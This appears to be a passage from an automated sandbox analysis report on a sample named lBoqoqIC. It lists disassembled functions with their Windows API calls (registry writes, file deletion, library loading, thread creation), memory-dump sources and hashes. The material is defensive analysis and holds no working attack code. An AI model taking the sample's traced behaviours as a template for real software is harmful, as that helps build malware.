                                                                                                                Function 004146D6 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004146DB
                                                                                                                • SHGetSpecialFolderLocation.SHELL32(00000000,?,?), ref: 00414702
                                                                                                                • SHGetPathFromIDList.SHELL32(?,?), ref: 00414716
                                                                                                                • SHGetMalloc.SHELL32(?), ref: 00414725
                                                                                                                • lstrlen.KERNEL32(?), ref: 0041474D
                                                                                                                • lstrlen.KERNEL32(?), ref: 00414760
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen$FolderFromH_prologListLocationMallocPathSpecial
                                                                                                                • String ID: \
                                                                                                                • API String ID: 4038027158-2967466578
                                                                                                                • Opcode ID: 5701878784d629f0add4754a3be26b0c9b6d3e6f361d898f4130899165ecca45
                                                                                                                • Instruction ID: bd4be8ed53d18429bd16d9bde03e8ea592aa461e643e342b25d5e2a4b64d4840
                                                                                                                • Opcode Fuzzy Hash: 5701878784d629f0add4754a3be26b0c9b6d3e6f361d898f4130899165ecca45
                                                                                                                • Instruction Fuzzy Hash: D821693190011DAFDB04DFA4D889BEEBBB8EF48304F10806AE915E7281D7349A45CF94
                                                                                                                Function 004A2D40 Relevance: 12.1, APIs: 8, Instructions: 61timefileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,00000000,00000000,00000000,00000000,?,?,?,004A3209,?,?,?,?,?,0049F538,00000862), ref: 004A2D4D
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,004A3209,?,?,?,?,?,0049F538,00000862), ref: 004A2D6A
                                                                                                                • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 004A2D8B
                                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004A2D9B
                                                                                                                • CreateFileA.KERNEL32(0000075E,40000000,00000000,00000000,00000003,80000000,00000000), ref: 004A2DBA
                                                                                                                • SetFileAttributesA.KERNEL32(0000075E,?), ref: 004A2DD2
                                                                                                                • SetFileTime.KERNEL32(00000000,?,?,?), ref: 004A2DE8
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004A2DEF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Time$CloseHandle$AttributesCreateDateLocalValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 2445228790-0
                                                                                                                • Opcode ID: d31f33879a0d0932a26e53b04af468a970044b85e23623c33d507bd766b6cab9
                                                                                                                • Instruction ID: 2e3a95eb7236647c3229abd3267b0354d2a7f6a97514d8b3cf721140446a48ad
                                                                                                                • Opcode Fuzzy Hash: d31f33879a0d0932a26e53b04af468a970044b85e23623c33d507bd766b6cab9
                                                                                                                • Instruction Fuzzy Hash: B711C471100346ABD220EB64DC88FBB77ACFB84750F000A1DF96696192DB74B809CB68
                                                                                                                Function 10002BB0 Relevance: 10.7, APIs: 7, Instructions: 223fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _strrchr.LIBCMT ref: 10002C07
                                                                                                                • GetFileAttributesA.KERNEL32(00000000,1001C030,?,00000000), ref: 10002C23
                                                                                                                • _strrchr.LIBCMT ref: 10002C35
                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000,?,?,?,?,00000000), ref: 10002DE1
                                                                                                                • DeleteFileA.KERNEL32(?,?,?,?,?,00000000), ref: 10002DE8
                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000,?,?,?,?,00000000), ref: 10002E01
                                                                                                                • RemoveDirectoryA.KERNEL32(?,?,?,?,?,00000000), ref: 10002E08
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Attributes$_strrchr$DeleteDirectoryRemove
                                                                                                                • String ID:
                                                                                                                • API String ID: 1865428942-0
                                                                                                                • Opcode ID: 5c1133e681a82aa2b1f29d2a9aba7692be0292bccdf77411fdd838d84a4b2a58
                                                                                                                • Instruction ID: a86d7072aa1f237bfd590c530da7ccd619eec75b1ba182d169b53ac92d9b8172
                                                                                                                • Opcode Fuzzy Hash: 5c1133e681a82aa2b1f29d2a9aba7692be0292bccdf77411fdd838d84a4b2a58
                                                                                                                • Instruction Fuzzy Hash: 807182B59002549AF751CF30CC80BEE73B9DF492C0F1582D9E659A728AEB30DD868755
                                                                                                                Function 10002E60 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 220registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RegCreateKeyExA.KERNEL32(80000002,?,00000000,00000000,00000000,00020106,00000000,?,00000000), ref: 100032BC
                                                                                                                • RegSetValueExA.KERNELBASE(?,?,00000000,00000004,1001C220,00000004), ref: 100032DA
                                                                                                                • RegCloseKey.KERNEL32(?), ref: 100032EA
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 10003306
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$CreateValue
                                                                                                                • String ID: %Qe$6A2V
                                                                                                                • API String ID: 1009429713-165075509
                                                                                                                • Opcode ID: d1adb0a9435689ccc7e59560294434ca3c917ffc4fb148fbd8bbf58d9696b306
                                                                                                                • Instruction ID: 9701926052440edfb952f16291a651358b50205cdd9003b7f3dcacbfad8b2c73
                                                                                                                • Opcode Fuzzy Hash: d1adb0a9435689ccc7e59560294434ca3c917ffc4fb148fbd8bbf58d9696b306
                                                                                                                • Instruction Fuzzy Hash: CAD17DB4D093688BDBA4CF58D981B9DBBB6AF48314F1081D9DA0DA7361DB305B85CF06
                                                                                                                Function 00479FB0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 167COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00479FB5
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0047A22E: __EH_prolog.LIBCMT ref: 0047A233
                                                                                                                • GetFileAttributesA.KERNEL32(?,.dat,00000000,?,00000000,0000002E,00523C88,?,?,?,00000000,00514880,/DATFILE,00523A30,00510870), ref: 0047A17F
                                                                                                                  • Part of subcall function 004C279E: __EH_prolog.LIBCMT ref: 004C27A3
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                • GetFileAttributesA.KERNEL32(?,00000000,?,?,?,?,?,00000000,00514880,/DATFILE,00523A30,00510870,?,00000000,_ir_tu2_temp,?), ref: 0047A072
                                                                                                                • GetFileAttributesA.KERNEL32(?,?,00510870,00510870,00523C84,?,00000000,00514880,/DATFILE,00523A30,00510870,?,00000000,_ir_tu2_temp,?,?), ref: 0047A0CD
                                                                                                                  • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFileH_prologInterlocked$Increment$Decrementlstrlen
                                                                                                                • String ID: .dat$/DATFILE
                                                                                                                • API String ID: 2903078539-3734404335
                                                                                                                • Opcode ID: 422077f05ffd68f1cfd918d373ffc439308f2974d8bc47cbcf6cda247729fb8d
                                                                                                                • Instruction ID: f39ebca024d9f9070bbb9e426eb7b52e45bccf392c95d3adb7dd4dc9415a9ae8
                                                                                                                • Opcode Fuzzy Hash: 422077f05ffd68f1cfd918d373ffc439308f2974d8bc47cbcf6cda247729fb8d
                                                                                                                • Instruction Fuzzy Hash: B261A078C00259DACF04EBA5C985EEEBBB4EF54308F10855EE415B3281DB786B49CB65
                                                                                                                Function 0040CA76 Relevance: 10.6, APIs: 7, Instructions: 134COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0040CA7B
                                                                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,0000005C,0000005C,?,00000000,00510870), ref: 0040CACE
                                                                                                                • SetCurrentDirectoryA.KERNEL32(?,?,00000000,00510870), ref: 0040CB2D
                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?,00000000,00510870), ref: 0040CB3F
                                                                                                                • SetCurrentDirectoryA.KERNEL32(?,00510870,00000002,?,00000002,?,00000000,00510870), ref: 0040CBC1
                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?,00000000,00510870), ref: 0040CBD3
                                                                                                                • SetCurrentDirectoryA.KERNEL32(?,?,00000000,00510870), ref: 0040CBF3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Directory$Current$Create$H_prolog
                                                                                                                • String ID:
                                                                                                                • API String ID: 291296761-0
                                                                                                                • Opcode ID: 40716f3851980a4ba98cea04baad11c2702fb2dff45ffb58a33ae0b8bd074f5f
                                                                                                                • Instruction ID: b004479bdaab3d3bd829a467c65cd02cbc0d56440a2eb029a2dbf14c7f884d89
                                                                                                                • Opcode Fuzzy Hash: 40716f3851980a4ba98cea04baad11c2702fb2dff45ffb58a33ae0b8bd074f5f
                                                                                                                • Instruction Fuzzy Hash: 7041A935900218DBCB10EFA4D8C6BEEBB78AB10744F00467BF955E71C1D778AA85CB94
                                                                                                                Function 0047A66E Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 60COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: Error%s (%d)$Notice%s$Skipped%s$Success%s$Warning%s (%d)
                                                                                                                • API String ID: 3519838083-3091091692
                                                                                                                • Opcode ID: f7fcb5b501ab4643951644a100e344e921a290076a31aa2af07d2169b61c595a
                                                                                                                • Instruction ID: c00101d51fd0725ddedb18ba59b7acc79d488dc364902b61f8dcc14e9708777c
                                                                                                                • Opcode Fuzzy Hash: f7fcb5b501ab4643951644a100e344e921a290076a31aa2af07d2169b61c595a
                                                                                                                • Instruction Fuzzy Hash: A6118E3690010AEBCF15DF90CC01DEE7F61FB44744B08C91BB82992290DB799A74AB5A
                                                                                                                Function 004CB66C Relevance: 9.0, APIs: 6, Instructions: 35COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • KiUserCallbackDispatcher.NTDLL(0000000B), ref: 004CB679
                                                                                                                • GetSystemMetrics.USER32(0000000C), ref: 004CB680
                                                                                                                • GetDC.USER32(00000000), ref: 004CB699
                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 004CB6AA
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004CB6B2
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 004CB6BA
                                                                                                                  • Part of subcall function 004D4BDB: GetSystemMetrics.USER32(00000002), ref: 004D4BED
                                                                                                                  • Part of subcall function 004D4BDB: GetSystemMetrics.USER32(00000003), ref: 004D4BF7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 1031845853-0
                                                                                                                • Opcode ID: 728750b86aee9f3288ab1b03eaa7706f7e1acab1d4fc09a5825885b453dbf76d
                                                                                                                • Instruction ID: bf57f687fb48ed17a37b73ff62f3306dad246145462785bd4eea27261f4cc86b
                                                                                                                • Opcode Fuzzy Hash: 728750b86aee9f3288ab1b03eaa7706f7e1acab1d4fc09a5825885b453dbf76d
                                                                                                                • Instruction Fuzzy Hash: 42F05B356407409BE7306B729C89F17B7A4EBD0755F11442FF6014A291D7749805CFA5
                                                                                                                Function 100078F0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 260memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VariantClear.OLEAUT32(?), ref: 1000799B
                                                                                                                • VariantInit.OLEAUT32(?), ref: 10007B70
                                                                                                                • VariantClear.OLEAUT32(?), ref: 10007B9B
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 10007BAB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$Clear$AllocInitString
                                                                                                                • String ID: p=5w
                                                                                                                • API String ID: 347172062-177745770
                                                                                                                • Opcode ID: 18d1f9bc7d60514b8c071061a647a9da248ff47cbcca3e148f92d8da5b3ecc60
                                                                                                                • Instruction ID: 3c42206e5b28316b31501cdf18cd05bef52e78a0fe20a107dde5727b69a291f3
                                                                                                                • Opcode Fuzzy Hash: 18d1f9bc7d60514b8c071061a647a9da248ff47cbcca3e148f92d8da5b3ecc60
                                                                                                                • Instruction Fuzzy Hash: 8EA16170E00219AFEB04CFA4C944FAEBBF9FF49344F118198E809AB255D775AE45CB61
                                                                                                                Function 10004E80 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 169registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • RegCreateKeyExA.KERNEL32(80000002,?,00000000,00000000,00000000,00020119,00000000,?,00000000,1001C030), ref: 10004FA4
                                                                                                                • RegGetValueA.KERNEL32(?,00000000,?,0000FFFF,00000000,?,00000100), ref: 100050B1
                                                                                                                • RegCloseKey.KERNEL32(?), ref: 10005174
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 10005199
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$CreateValue
                                                                                                                • String ID: 6A2V
                                                                                                                • API String ID: 1009429713-3928244006
                                                                                                                • Opcode ID: d038902e2427403cfd14828d04b0e9199c780aca3457f5c9a8002d1d2ece64d9
                                                                                                                • Instruction ID: f406244ca8765bbdaa865aace1ddcdcb15ada761b1f8d3fbcaf8f67fc62f28a2
                                                                                                                • Opcode Fuzzy Hash: d038902e2427403cfd14828d04b0e9199c780aca3457f5c9a8002d1d2ece64d9
                                                                                                                • Instruction Fuzzy Hash: 1A810474D026689BEB65CF68CC81BE9B7B4EF58304F1042E9E94DA6251EA306FC0CF40
                                                                                                                Function 0040FB14 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0040FB19
                                                                                                                • GetFileAttributesA.KERNEL32(?,00523A30), ref: 0040FB45
                                                                                                                • lstrcpy.KERNEL32(?,?), ref: 0040FB5E
                                                                                                                • 752A1540.VERSION(00000000,00510870,?,?,?,?,00000000,00000000,?,?), ref: 0040FBA6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: A1540AttributesFileH_prologlstrcpy
                                                                                                                • String ID: %d.%d.%d.%d
                                                                                                                • API String ID: 1283897525-3491811756
                                                                                                                • Opcode ID: 560e92ed6bc7b703a7b8806d789cf5f160a4c0ccd40808d0dd8f4f64d1ac0b9e
                                                                                                                • Instruction ID: 61324e16eef9b0d4f44c5c22405ee6a7285c9c968dd6a85eef361aacf5229f39
                                                                                                                • Opcode Fuzzy Hash: 560e92ed6bc7b703a7b8806d789cf5f160a4c0ccd40808d0dd8f4f64d1ac0b9e
                                                                                                                • Instruction Fuzzy Hash: 93318E7280011DAACB11EBE5CC55EFFBB78EF44318F00442EF415A6282DB38AA49CB64
                                                                                                                Function 004087DB Relevance: 7.7, APIs: 5, Instructions: 240libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004087E0
                                                                                                                • LoadLibraryA.KERNEL32(00000001,0000000A), ref: 0040882F
                                                                                                                • LoadLibraryExA.KERNEL32(00000002,00000000,00000008), ref: 00408843
                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 00408862
                                                                                                                • FreeLibrary.KERNEL32(00000001,?,?,?), ref: 00408A4F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$Load$AddressFreeH_prologProc
                                                                                                                • String ID:
                                                                                                                • API String ID: 2839045223-0
                                                                                                                • Opcode ID: 2e349856f6d3297eccab51125db814eb1e16c0bcb409ca026aaa6fcff38cab43
                                                                                                                • Instruction ID: c7671ed60aab9ea2157ca98127249b64f00efbc9446199d525a1fb24186d32c1
                                                                                                                • Opcode Fuzzy Hash: 2e349856f6d3297eccab51125db814eb1e16c0bcb409ca026aaa6fcff38cab43
                                                                                                                • Instruction Fuzzy Hash: 87918271A01218EFDB04EBA4C985FEEBBB8AF14714F10406EF145B72C1DB785A44CB69
                                                                                                                Function 10002AE0 Relevance: 7.6, APIs: 5, Instructions: 80threadsynchronizationCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005170,00000000,00000000,?), ref: 10002B11
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00004290,00000000,00000000,00000000), ref: 10002B31
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00004560,00000000,00000000,00000000), ref: 10002B4B
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00000060,00000000,00000000,00000000), ref: 10002B6A
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10002B75
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateThread$ObjectSingleWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 1771687473-0
                                                                                                                • Opcode ID: a769c7bcd23f44c9f69914c10279ee953aa0830677c1d322a5daef02a64d2d12
                                                                                                                • Instruction ID: 6c6d755d479546e6741bf4c9a9b6ed6b99bbcb95999d51c39df5a07d3ea757a4
                                                                                                                • Opcode Fuzzy Hash: a769c7bcd23f44c9f69914c10279ee953aa0830677c1d322a5daef02a64d2d12
                                                                                                                • Instruction Fuzzy Hash: 0E11B672A8031DB6F611EAA48C02FAA73ACDF45B90F210151FB04BB1C4DBB5F9004A64
                                                                                                                Function 004D006F Relevance: 7.6, APIs: 5, Instructions: 65windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004C93E0: GetWindowLongA.USER32(?,000000F0), ref: 004C93EC
                                                                                                                • SendMessageA.USER32(?,00000086,00000001,00000000), ref: 004D00C5
                                                                                                                • SendMessageA.USER32(?,00000086,00000000,00000000), ref: 004D00D9
                                                                                                                • GetDesktopWindow.USER32 ref: 004D00DD
                                                                                                                • GetWindow.USER32(00000000), ref: 004D00EA
                                                                                                                • SendMessageA.USER32(00000000,0000036D,?,00000000), ref: 004D010B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
